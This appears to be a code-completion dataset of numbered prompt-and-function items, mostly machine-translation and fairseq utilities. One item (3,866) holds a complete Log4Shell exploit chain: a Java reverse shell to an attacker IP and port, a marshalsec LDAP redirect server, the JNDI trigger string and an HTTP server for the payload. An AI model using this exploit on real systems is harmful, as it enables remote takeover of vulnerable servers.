GELU activation https://arxiv.org/abs/1606.08415 https://github.com/huggingface/pytorch-openai-transformer-lm/blob/master/model_pytorch.py#L14 https://github.com/huggingface/pytorch-pretrained-BERT/blob/master/modeling.py
Here is the function:
def gelu(x):
    """
    GELU activation (exact erf form): x * Phi(x), where Phi is the CDF of
    the standard normal distribution.

    https://arxiv.org/abs/1606.08415
    https://github.com/huggingface/pytorch-openai-transformer-lm/blob/master/model_pytorch.py#L14
    https://github.com/huggingface/pytorch-pretrained-BERT/blob/master/modeling.py
    """
    cdf = 0.5 * (1.0 + torch.erf(x / math.sqrt(2.0)))
    return x * cdf
3,851 | from logging import getLogger
import math
import itertools
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
The provided code snippet includes necessary dependencies for implementing the `get_masks` function. Write a Python function `def get_masks(slen, lengths, causal, k=None)` to solve the following problem:
Generate hidden states mask, and optionally an attention mask.
Here is the function:
def get_masks(slen, lengths, causal, k=None):
    """
    Generate hidden states mask, and optionally an attention mask.

    Returns (mask, attn_mask): `mask` is (bs, slen), True at valid
    (non-padding) positions; `attn_mask` equals `mask` unless `causal`,
    in which case it is the (bs, slen, slen) lower-triangular mask where
    position i may attend to positions <= i. `k` is accepted for API
    compatibility but unused here.
    """
    assert lengths.max().item() <= slen
    bs = lengths.size(0)
    positions = torch.arange(slen, dtype=torch.long, device=lengths.device)
    mask = positions < lengths[:, None]
    if causal:
        attn_mask = positions[None, None, :].repeat(bs, slen, 1) <= positions[None, :, None]
    else:
        attn_mask = mask
    # sanity check
    assert mask.size() == (bs, slen)
    assert causal is False or attn_mask.size() == (bs, slen, slen)
    return mask, attn_mask
3,852 | import os
import io
import sys
import argparse
import torch
from src.utils import AttrDict
from src.utils import bool_flag, initialize_exp
from src.data.dictionary import Dictionary
from src.model.transformer import TransformerModel
from src.fp16 import network_to_half
def bool_flag(s):
    """
    Parse boolean arguments from the command line.

    Case-insensitive membership in FALSY_STRINGS / TRUTHY_STRINGS decides
    the value; anything else raises ArgumentTypeError so argparse reports
    a clean error. NOTE(review): FALSY_STRINGS / TRUTHY_STRINGS are
    defined elsewhere in this module (typically {'off','false','0'} /
    {'on','true','1'}) — confirm.
    """
    if s.lower() in FALSY_STRINGS:
        return False
    elif s.lower() in TRUTHY_STRINGS:
        return True
    else:
        raise argparse.ArgumentTypeError("Invalid value for a boolean flag!")
The provided code snippet includes necessary dependencies for implementing the `get_parser` function. Write a Python function `def get_parser()` to solve the following problem:
Generate a parameters parser.
Here is the function:
def get_parser():
    """
    Generate a parameters parser.

    Builds the argparse parser for the sentence translation script:
    experiment bookkeeping, batching/precision, model and output paths,
    beam-search options, and the source/target languages.
    """
    # parse parameters
    parser = argparse.ArgumentParser(description="Translate sentences")
    # main parameters
    parser.add_argument("--dump_path", type=str, default="./dumped/", help="Experiment dump path")
    parser.add_argument("--exp_name", type=str, default="", help="Experiment name")
    parser.add_argument("--exp_id", type=str, default="", help="Experiment ID")
    parser.add_argument("--fp16", type=bool_flag, default=False, help="Run model with float16")
    parser.add_argument("--batch_size", type=int, default=32, help="Number of sentences per batch")
    # model / output paths
    parser.add_argument("--model_path", type=str, default="", help="Model path")
    parser.add_argument("--output_path", type=str, default="", help="Output path")
    parser.add_argument("--beam", type=int, default=1, help="Beam size")
    parser.add_argument("--length_penalty", type=float, default=1, help="length penalty")
    # parser.add_argument("--max_vocab", type=int, default=-1, help="Maximum vocabulary size (-1 to disable)")
    # parser.add_argument("--min_count", type=int, default=0, help="Minimum vocabulary count")
    # source language / target language
    parser.add_argument("--src_lang", type=str, default="", help="Source language")
    parser.add_argument("--tgt_lang", type=str, default="", help="Target language")
    return parser
3,853 | import re
import argparse
from langdetect import detect
from polyglot.detect import Detector
def get_parser():
    """
    Build the argparse parser for the noisy-data filtering script:
    input file path, its language code, and an optional output path.
    """
    parser = argparse.ArgumentParser(description="Remove noisy data")
    parser.add_argument("--input", type=str,
                        help="The path of input file")
    parser.add_argument("--lang", type=str,
                        help="The language of input file")
    parser.add_argument("--output", type=str, default=None,
                        help="The path of output file")
    return parser
3,854 | import re
import argparse
from langdetect import detect
from polyglot.detect import Detector
# URL body: the character alternation used by the original patterns.
_URL_BODY = r'(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\), ]|(?:%[0-9a-fA-F][0-9a-fA-F]))+'
# well-formed "http://" / "https://" URLs
_URL_RE = re.compile(r'http[s]?://' + _URL_BODY)
# malformed URLs missing the ':' (e.g. "http//example.com"), which the
# original code also treated as URLs
_MALFORMED_URL_RE = re.compile(r'http[s]?//' + _URL_BODY)


def detect_exist_url(text):
    """
    Return True if `text` contains an http(s) URL, including malformed
    ones written without the ':' (e.g. "http//...").

    The patterns are compiled once at module load (the original
    recompiled them on every call) and search() is used instead of
    findall(), which avoids materialising the full match list.
    """
    return bool(_URL_RE.search(text) or _MALFORMED_URL_RE.search(text))
3,855 | import re
import argparse
from langdetect import detect
from polyglot.detect import Detector
def detect_lang(text, lang):
    """
    Return True if `text` is detected to be in language `lang`.

    Tries polyglot's Detector first, accepting only a top-ranked (i == 0)
    match, then falls back to langdetect. Returns False when neither
    agrees or when detection raises (both libraries raise on very short
    or ambiguous input).
    """
    try:
        for i, l in enumerate(Detector(text, quiet=True).languages):
            if l.code == lang and i == 0:
                return True
        if detect(text) == lang:
            return True
        return False
    except Exception:
        # was a bare `except:` — narrowed so KeyboardInterrupt/SystemExit
        # still propagate instead of being swallowed as "not this language"
        return False
3,856 | import math
import torch
import torch.nn as nn
import torch.nn.functional as F
from fairseq import options, utils
from fairseq.models import (
FairseqEncoder,
FairseqIncrementalDecoder,
FairseqEncoderDecoderModel,
register_model,
register_model_architecture,
)
from fairseq.modules import (
MultiheadAttention,
LayerNorm,
)
from fairseq.modules.transformer_sentence_encoder import init_bert_params
from .learned_positional_embedding import LearnedPositionalEmbedding
def Embedding(num_embeddings, embedding_dim, padding_idx):
    """nn.Embedding initialised with N(0, dim**-0.5); the padding row is zeroed."""
    table = nn.Embedding(num_embeddings, embedding_dim, padding_idx=padding_idx)
    nn.init.normal_(table.weight, mean=0, std=embedding_dim ** -0.5)
    nn.init.constant_(table.weight[padding_idx], 0)
    return table
3,857 | import math
import torch
import torch.nn as nn
import torch.nn.functional as F
from fairseq import options, utils
from fairseq.models import (
FairseqEncoder,
FairseqIncrementalDecoder,
FairseqEncoderDecoderModel,
register_model,
register_model_architecture,
)
from fairseq.modules import (
MultiheadAttention,
LayerNorm,
)
from fairseq.modules.transformer_sentence_encoder import init_bert_params
from .learned_positional_embedding import LearnedPositionalEmbedding
def Linear(in_features, out_features, bias=True):
    """nn.Linear with Xavier-uniform weights and (when present) a zero bias."""
    layer = nn.Linear(in_features, out_features, bias)
    nn.init.xavier_uniform_(layer.weight)
    if bias:
        nn.init.constant_(layer.bias, 0.)
    return layer
3,858 | import math
import torch
import torch.nn as nn
import torch.nn.functional as F
from fairseq import options, utils
from fairseq.models import (
FairseqEncoder,
FairseqIncrementalDecoder,
FairseqEncoderDecoderModel,
register_model,
register_model_architecture,
)
from fairseq.modules import (
MultiheadAttention,
LayerNorm,
)
from fairseq.modules.transformer_sentence_encoder import init_bert_params
from .learned_positional_embedding import LearnedPositionalEmbedding
def transformer_middle(args):
    """Fill in the 'middle'-sized transformer hyper-parameter defaults
    (1024-dim, 16-head, 6-layer encoder/decoder), keeping any values the
    caller already set, then fall through to the base defaults."""
    defaults = {
        'encoder_embed_dim': 1024,
        'encoder_ffn_embed_dim': 4096,
        'encoder_attention_heads': 16,
        'encoder_layers': 6,
        'decoder_embed_dim': 1024,
        'decoder_ffn_embed_dim': 4096,
        'decoder_attention_heads': 16,
        'decoder_layers': 6,
    }
    for name, value in defaults.items():
        setattr(args, name, getattr(args, name, value))
    transformer_base(args)
def transformer_big(args):
    """The 'big' variant: 12 encoder/decoder layers on top of the
    'middle' defaults (caller-provided values win)."""
    for name in ('encoder_layers', 'decoder_layers'):
        setattr(args, name, getattr(args, name, 12))
    transformer_middle(args)
3,859 | from collections import OrderedDict
from fairseq import utils
from fairseq.models import FairseqMultiModel, register_model, register_model_architecture, BaseFairseqModel
from fairseq.models.transformer import (
base_architecture,
Embedding,
TransformerEncoder,
TransformerDecoder,
TransformerModel,
)
import torch.nn as nn
import torch.nn.functional as F
def base_x_transformer(args):
    """Default ('base') hyper-parameters for the x-transformer architecture:
    simply delegates to fairseq's transformer base_architecture."""
    base_architecture(args)
3,860 | from collections import OrderedDict
from fairseq import utils
from fairseq.models import FairseqMultiModel, register_model, register_model_architecture, BaseFairseqModel
from fairseq.models.transformer import (
base_architecture,
Embedding,
TransformerEncoder,
TransformerDecoder,
TransformerModel,
)
import torch.nn as nn
import torch.nn.functional as F
def build_embedding(dictionary, embed_dim, path=None):
    """
    Build an embedding table for `dictionary` with width `embed_dim`,
    padded at dictionary.pad().

    If `path` is given, pretrained vectors are parsed from it and copied
    into the table for the words they cover.
    """
    num_embeddings = len(dictionary)
    padding_idx = dictionary.pad()
    emb = Embedding(num_embeddings, embed_dim, padding_idx)
    # if provided, load from preloaded dictionaries
    if path:
        embed_dict = utils.parse_embedding(path)
        utils.load_embedding(embed_dict, dictionary, emb)
    return emb
3,861 | import numpy as np
import torch
from fairseq import utils
from fairseq.data import data_utils, FairseqDataset
def collate(
    samples, pad_idx, eos_idx, left_pad_source=True, left_pad_target=False,
    input_feeding=True
):
    """
    Merge a list of sample dicts into a padded mini-batch (fairseq style).

    Each sample has 'id', 'source' and optionally 'target' tensors. The
    batch is sorted by descending source length; when `input_feeding` is
    on and targets exist, a 'prev_output_tokens' tensor (targets shifted
    so EOS leads) is added for teacher forcing.
    """
    if len(samples) == 0:
        return {}

    def merge(key, left_pad, move_eos_to_beginning=False):
        # pad all samples' `key` tensors to a common length
        return data_utils.collate_tokens(
            [s[key] for s in samples],
            pad_idx, eos_idx, left_pad, move_eos_to_beginning,
        )

    # NOTE(review): `id` shadows the builtin; kept for fairseq compatibility
    id = torch.LongTensor([s['id'] for s in samples])
    src_tokens = merge('source', left_pad=left_pad_source)
    # sort by descending source length
    src_lengths = torch.LongTensor([s['source'].numel() for s in samples])
    src_lengths, sort_order = src_lengths.sort(descending=True)
    id = id.index_select(0, sort_order)
    src_tokens = src_tokens.index_select(0, sort_order)
    prev_output_tokens = None
    target = None
    if samples[0].get('target', None) is not None:
        target = merge('target', left_pad=left_pad_target)
        target = target.index_select(0, sort_order)
        ntokens = sum(len(s['target']) for s in samples)
        if input_feeding:
            # we create a shifted version of targets for feeding the
            # previous output token(s) into the next decoder step
            prev_output_tokens = merge(
                'target',
                left_pad=left_pad_target,
                move_eos_to_beginning=True,
            )
            prev_output_tokens = prev_output_tokens.index_select(0, sort_order)
    else:
        ntokens = sum(len(s['source']) for s in samples)
    batch = {
        'id': id,
        'nsentences': len(samples),
        'ntokens': ntokens,
        'net_input': {
            'src_tokens': src_tokens,
            'src_lengths': src_lengths,
        },
        'target': target,
    }
    if prev_output_tokens is not None:
        batch['net_input']['prev_output_tokens'] = prev_output_tokens
    return batch
3,862 | import numpy as np
import torch
from fairseq import utils
from fairseq.data import data_utils, FairseqDataset
The provided code snippet includes necessary dependencies for implementing the `generate_dummy_batch` function. Write a Python function `def generate_dummy_batch(num_tokens, collate_fn, src_vocab, tgt_vocab, src_len=128, tgt_len=128)` to solve the following problem:
Return a dummy batch with a given number of tokens.
Here is the function:
def generate_dummy_batch(num_tokens, collate_fn, src_vocab, tgt_vocab, src_len=128, tgt_len=128):
    """Return a dummy batch with a given number of tokens.

    The batch size is num_tokens // max(src_len, tgt_len); each sample's
    source/target/output is a dummy sentence drawn from the matching vocab.
    """
    bsz = num_tokens // max(src_len, tgt_len)
    samples = []
    for sample_id in range(bsz):
        samples.append({
            'id': sample_id,
            'source': src_vocab.dummy_sentence(src_len),
            'target': tgt_vocab.dummy_sentence(tgt_len),
            'output': tgt_vocab.dummy_sentence(tgt_len),
        })
    return collate_fn(samples)
3,863 | from collections import OrderedDict
import os
import torch
from fairseq.data import (
IndexedCachedDataset,
IndexedDataset,
IndexedRawTextDataset,
LanguagePairDataset,
NoisingDataset,
RoundRobinZipDatasets,
MonolingualDataset,
TokenBlockDataset,
)
from fairseq.data.masked_lm_dictionary import MaskedLMDictionary
from fairseq import options, checkpoint_utils
from fairseq.models import FairseqMultiModel
from fairseq.sequence_generator import SequenceGenerator
from fairseq.tasks import register_task, FairseqTask
from fairseq.tasks.semisupervised_translation import parse_lambda_config
from .masked_language_pair_dataset import MaskedLanguagePairDataset
from .noisy_language_pair_dataset import NoisyLanguagePairDataset
def _get_mass_dataset_key(lang_pair):
    # key under which the MASS (masked seq2seq) dataset for `lang_pair`
    # is stored in the round-robin dataset dict
    return "mass:" + lang_pair
3,864 | from collections import OrderedDict
import os
import torch
from fairseq.data import (
IndexedCachedDataset,
IndexedDataset,
IndexedRawTextDataset,
LanguagePairDataset,
NoisingDataset,
RoundRobinZipDatasets,
MonolingualDataset,
TokenBlockDataset,
)
from fairseq.data.masked_lm_dictionary import MaskedLMDictionary
from fairseq import options, checkpoint_utils
from fairseq.models import FairseqMultiModel
from fairseq.sequence_generator import SequenceGenerator
from fairseq.tasks import register_task, FairseqTask
from fairseq.tasks.semisupervised_translation import parse_lambda_config
from .masked_language_pair_dataset import MaskedLanguagePairDataset
from .noisy_language_pair_dataset import NoisyLanguagePairDataset
def _get_mt_dataset_key(lang_pair):
    # plain MT datasets are keyed by the bare language pair; the "" +
    # prefix mirrors the other _get_*_dataset_key helpers (and type-checks
    # that `lang_pair` is a str)
    return "" + lang_pair
3,865 | from collections import OrderedDict
import os
import torch
from fairseq.data import (
IndexedCachedDataset,
IndexedDataset,
IndexedRawTextDataset,
LanguagePairDataset,
NoisingDataset,
RoundRobinZipDatasets,
MonolingualDataset,
TokenBlockDataset,
)
from fairseq.data.masked_lm_dictionary import MaskedLMDictionary
from fairseq import options, checkpoint_utils
from fairseq.models import FairseqMultiModel
from fairseq.sequence_generator import SequenceGenerator
from fairseq.tasks import register_task, FairseqTask
from fairseq.tasks.semisupervised_translation import parse_lambda_config
from .masked_language_pair_dataset import MaskedLanguagePairDataset
from .noisy_language_pair_dataset import NoisyLanguagePairDataset
def _get_memt_dataset_key(lang_pair):
    # key for the "memt" dataset variant for `lang_pair` — presumably
    # masked-encoder MT; confirm against the task that consumes these keys
    return "memt:" + lang_pair
3,866 | import argparse
from colorama import Fore, init
import subprocess
import threading
from pathlib import Path
import os
from http.server import HTTPServer, SimpleHTTPRequestHandler
def generate_payload(userip: str, lport: int) -> None:
    """
    Write Exploit.java — a reverse-shell payload that connects back to
    userip:lport — and compile it with the bundled JDK's javac.

    NOTE(review): offensive-security PoC code (Log4Shell-style JNDI
    exploitation); relies on a module-level CUR_FOLDER defined elsewhere
    in this file.
    """
    # Java source with host/port interpolated via %-formatting below
    program = """
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.Socket;
public class Exploit {
public Exploit() throws Exception {
String host="%s";
int port=%d;
String cmd="/bin/sh";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),
pe=p.getErrorStream(),
si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()) {
while(pi.available()>0)
so.write(pi.read());
while(pe.available()>0)
so.write(pe.read());
while(si.available()>0)
po.write(si.read());
so.flush();
po.flush();
Thread.sleep(50);
try {
p.exitValue();
break;
}
catch (Exception e){
}
};
p.destroy();
s.close();
}
}
""" % (userip, lport)
    # writing the exploit to Exploit.java file
    p = Path("Exploit.java")
    try:
        p.write_text(program)
        subprocess.run([os.path.join(CUR_FOLDER, "jdk1.8.0_20/bin/javac"), str(p)])
    except OSError as e:
        print(Fore.RED + f'[-] Something went wrong {e}')
        raise e
    else:
        print(Fore.GREEN + '[+] Exploit java class created success')
def ldap_server(userip: str, lport: int) -> None:
    """
    Launch the marshalsec LDAP reference server, which redirects JNDI
    lookups to the Exploit class served over HTTP at userip:lport.

    Blocks for the lifetime of the java process; run on its own thread.
    """
    # the JNDI string a vulnerable log4j target must log to trigger the chain
    sendme = "${jndi:ldap://%s:1389/a}" % (userip)
    print(Fore.GREEN + f"[+] Send me: {sendme}\n")
    url = "http://{}:{}/#Exploit".format(userip, lport)
    subprocess.run([
        os.path.join(CUR_FOLDER, "jdk1.8.0_20/bin/java"),
        "-cp",
        os.path.join(CUR_FOLDER, "target/marshalsec-0.0.3-SNAPSHOT-all.jar"),
        "marshalsec.jndi.LDAPRefServer",
        url,
    ])
def payload(userip: str, webport: int, lport: int) -> None:
    """
    Orchestrate the attack: compile the payload, start the LDAP redirect
    server on a background thread, then serve the compiled class over
    HTTP from the current directory (this call blocks forever).
    """
    generate_payload(userip, lport)
    print(Fore.GREEN + '[+] Setting up LDAP server\n')
    # create the LDAP server on new thread
    t1 = threading.Thread(target=ldap_server, args=(userip, webport))
    t1.start()
    # start the web server
    print(f"[+] Starting Webserver on port {webport} http://0.0.0.0:{webport}")
    httpd = HTTPServer(('0.0.0.0', webport), SimpleHTTPRequestHandler)
    httpd.serve_forever()
3,867 | import argparse
from colorama import Fore, init
import subprocess
import threading
from pathlib import Path
import os
from http.server import HTTPServer, SimpleHTTPRequestHandler
CUR_FOLDER = Path(__file__).parent.resolve()
def check_java() -> bool:
    """Return True when the bundled JDK's `java -version` exits with status 0."""
    java_binary = os.path.join(CUR_FOLDER, 'jdk1.8.0_20/bin/java')
    exit_code = subprocess.call(
        [java_binary, '-version'],
        stderr=subprocess.DEVNULL,
        stdout=subprocess.DEVNULL,
    )
    return exit_code == 0
3,868 | from setuptools import find_packages, setup
import os
import subprocess
import sys
import time
import torch
from torch.utils.cpp_extension import (BuildExtension, CppExtension,
CUDAExtension)
def readme():
    """Return the long description for setup(); currently an empty string
    because reading README.md is disabled."""
    return ''
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.